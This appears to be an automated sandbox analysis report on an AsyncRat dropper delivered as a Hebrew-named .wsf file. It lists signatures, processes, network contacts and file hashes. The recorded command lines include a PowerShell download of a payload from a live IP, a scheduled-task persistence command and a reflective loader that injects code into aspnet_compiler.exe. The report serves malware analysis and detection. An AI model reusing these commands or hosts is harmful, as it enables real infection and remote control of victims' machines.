Analysis Overview
SHA256
68abac9468d8751819413ce014642d97d7857462306126d6c9a938ae722bda69
Threat Level: Known bad
The file תיק החקירה.wsf was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Blocklisted process makes network request
Checks computer location settings
Executes dropped EXE
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Modifies registry class
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-28 14:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 14:01
Reported
2024-06-28 14:04
Platform
win7-20240611-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2564 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2564 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2564 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\תיק החקירה.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -Command "Start-BitsTransfer -Source 'http://109.199.101.109:770/1002.jpg' -Destination 'C:\Users\Public\bbbb.zip'; Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public\'"
Network
| Country | Destination | Domain | Proto |
| DE | 109.199.101.109:770 | 109.199.101.109 | tcp |
Files
memory/2796-7-0x000007FEF54BE000-0x000007FEF54BF000-memory.dmp
memory/2796-8-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2796-9-0x0000000001F70000-0x0000000001F78000-memory.dmp
memory/2796-10-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp
memory/2796-11-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp
memory/2796-12-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp
memory/2796-13-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-28 14:01
Reported
2024-06-28 14:04
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
148s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2640 set thread context of 4372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\תיק החקירה.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -Command "Start-BitsTransfer -Source 'http://109.199.101.109:770/1002.jpg' -Destination 'C:\Users\Public\bbbb.zip'; Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public\'"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4572,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4168 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[System.Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',[Byte[]]$result)); "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Users\Public\AutoHotkey.exe
C:\\Users\\Public\\AutoHotkey.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[System.Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',[Byte[]]$result)); "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| DE | 109.199.101.109:770 | 109.199.101.109 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.101.199.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| DE | 109.199.101.109:770 | 109.199.101.109 | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | word2.webredirect.org | udp |
| DE | 109.199.101.109:1002 | word2.webredirect.org | tcp |
| DE | 109.199.101.109:1002 | word2.webredirect.org | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
memory/4624-3-0x00007FFBF8273000-0x00007FFBF8275000-memory.dmp
memory/4624-4-0x000001D300030000-0x000001D300052000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wv4kw5z5.eah.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4624-14-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
memory/4624-15-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
memory/4624-16-0x000001D29C5E0000-0x000001D29C606000-memory.dmp
memory/4624-17-0x000001D300000000-0x000001D300014000-memory.dmp
memory/4624-18-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
memory/4624-19-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
memory/4624-20-0x000001D300060000-0x000001D300072000-memory.dmp
memory/4624-21-0x000001D2FFFC0000-0x000001D2FFFCA000-memory.dmp
memory/4624-48-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
C:\Users\Public\Auto.vbs
| MD5 | 1b86ac4c78166fdc657b6ac7c9519761 |
| SHA1 | 62c6acb48467dc21d2bccc44b0069690dc65fd4d |
| SHA256 | fa790a55aac779658064f7ce83cee26b84c424e3fe9002ce854d1a142dcb5633 |
| SHA512 | 482be9eae47c42f7bcbc328bd3f38f476cee5da4ccad5b56133997ce3c0474abc179ecef4dd5a7e60de6177068be19e9fbf7e81895b067e3dd59d3d264c94389 |
C:\Users\Public\node.bat
| MD5 | 52dc8ab7250ca32c7dea8867d6464e5b |
| SHA1 | 4e3202f42632fa8a2c1c632af80b8223b9ada385 |
| SHA256 | b99b7a8864e07ed15ba3e11ec6e5ad793d3a8e257321c89c7c2b7842cc674728 |
| SHA512 | f43a7fc7e9d57f46eb08a8d84dde6503b5fd65c1f2e4a28f80ca700ca2050506c05b09ad52e092c6b46f094a079580bbd863cf04ff0ea3db589d2527218ef985 |
C:\Users\Public\AutoHotkey.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Public\AutoHotkey
| MD5 | 4347a6be90f50fa6d2b840b429a9563b |
| SHA1 | 988e58ea6b12cc4eff037cb4b69ce0824de6081a |
| SHA256 | 7c8a123e9a3afd0df3193b07c32fe68b07409f2ced5db80f5b93125cf5961f08 |
| SHA512 | 76ee9ecfe034f8c77ab0773a4f0a704a35bb043d3038503e4238dd7294730f43e18f28c1653c220895730ce764f1362fea74cf2c5dde3d374dc315cf46c51517 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | e5ab5d093e49058a43f45f317b401e68 |
| SHA1 | 120da069a87aa9507d2b66c07e368753d3061c2d |
| SHA256 | 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74 |
| SHA512 | d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 176e06d925350cd4e4fe35470be810d9 |
| SHA1 | 60e4033d866f64faa490dad93552ec221a7c3db9 |
| SHA256 | 1db23e1c00caceb52423a6e78b3923eb6cbde8fc9c5ca86ae88b717a433ddbb4 |
| SHA512 | 6f661ba92185d85329b119944ec5098bb0b05d2c00ed3353b5a21639caef921033634706083fe7b7a8d09a65d71b7f4e9d07b4f33740a30d38ef6b7fc21d50b1 |
C:\Users\Public\runpe.txt
| MD5 | 7044d392ceb5669de318f1deb11cfd66 |
| SHA1 | c9ddff7f4d14b3c9e3b55673da885fb5951944e8 |
| SHA256 | 6b54452e750818739847993e973e8c4cc9ab42fd2ebbe5c919228e34043554c1 |
| SHA512 | aff117f62f4f16ee5679e725caff28ebabffb2c24cdd248b13245bb7c55f25da7494b7e41ad3bd01dde59c55f0d52211dfbe0c77c1db5167a78649937c6a7dcb |
C:\Users\Public\msg.txt
| MD5 | 5b40f06d02914fbc374f8bbf2228eb33 |
| SHA1 | b5582251566e3942fac3f8fc31fb176771025c64 |
| SHA256 | 90480c389a4de82ba8d4dde40522b34bb4cd770eb423fe45eb988c36791ddf1e |
| SHA512 | d8ab3ef5eb850c07e50c10ab06de9ddeec7d432b7521711c63e6bf662cfd1c5172acfae76814f6764c5e0d85fd3c3c53ca0ec890529000c1943e848c190bcdb8 |
C:\Users\Public\Gettype.txt
| MD5 | 9221b7b54ed96de7281d31f8ae35be6a |
| SHA1 | 223fad426aa8c753546501b0643ee1720b57bff0 |
| SHA256 | 8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a |
| SHA512 | be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d |
C:\Users\Public\load.txt
| MD5 | ec4d1eb36b22d19728e9d1d23ca84d1c |
| SHA1 | 5dbc716c4600097b85b9e51d6aeb77a4363b03ed |
| SHA256 | 0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0 |
| SHA512 | d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700 |
C:\Users\Public\Invoke.txt
| MD5 | 5fb833d20ef9f93596f4117a81523536 |
| SHA1 | d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5 |
| SHA256 | e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73 |
| SHA512 | afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35 |
C:\Users\Public\Execute.txt
| MD5 | 720d2a3ed7e16367c31bbca2a6c5c924 |
| SHA1 | 9c58ec9c24bea197af824d0b78678d7188a348c7 |
| SHA256 | 0bfa2b7d3d1a1a671c126dc0aa12a7e3a28e5d3b54ab668783e08cafedafbc3a |
| SHA512 | 0f694d314315eeb5e3d5d8f21619537cd7723203274c98730937c1a02498ca4e4b6d6dce7d25003c3f7a4725995c96cc12e3daffbab20b10de788dd4d330b622 |
C:\Users\Public\NewPE2.txt
| MD5 | 6aa09883f5176f1b1696b2a27d89146a |
| SHA1 | b258abd44ce2f9281802a6f51d5fe283aaaab74a |
| SHA256 | ceebdf25f96dda93a3a2117d59ac847823b591abbebadcbb36182b50ab625c70 |
| SHA512 | 7c08f8135817962d4ec5b3e0d88371807f88dea037cf46b7187957d55d6e7b0fadc57c1f14b8b07c33b126655bbabe8b9f3f21ff6914737c105a91381fecdb9d |
C:\Users\Public\getMethod.txt
| MD5 | db37f91f128a82062af0f39f649ea122 |
| SHA1 | f21110ae7ac7cde74e7aa59b22ed10bace35b06b |
| SHA256 | e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32 |
| SHA512 | 681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae |
memory/2640-85-0x000001985D770000-0x000001985D77E000-memory.dmp
memory/2640-86-0x000001985D7F0000-0x000001985D7FA000-memory.dmp
memory/4372-87-0x0000000000400000-0x0000000000416000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2eb89531251cc009c6fc9287f0b4528a |
| SHA1 | 59ee6b887a7c617ec43612d9d40d24c3d707042d |
| SHA256 | bcc67a890072b5037b2196ba3f6c9d8250820e1ba358eaea75749c70a6cd906d |
| SHA512 | 91d07f61f9c8740bc7cfc6c498414336ee04fba31a87afca285172ddbec138c469e5de25363028205d3d415a891b87e9711ffb5e4b49d367c72ac919c5294433 |
memory/4372-90-0x0000000005960000-0x0000000005F04000-memory.dmp
memory/4372-91-0x0000000005590000-0x0000000005622000-memory.dmp
memory/4372-92-0x0000000005630000-0x000000000563A000-memory.dmp
memory/4372-95-0x0000000006730000-0x00000000067CC000-memory.dmp
memory/4372-96-0x00000000067D0000-0x0000000006836000-memory.dmp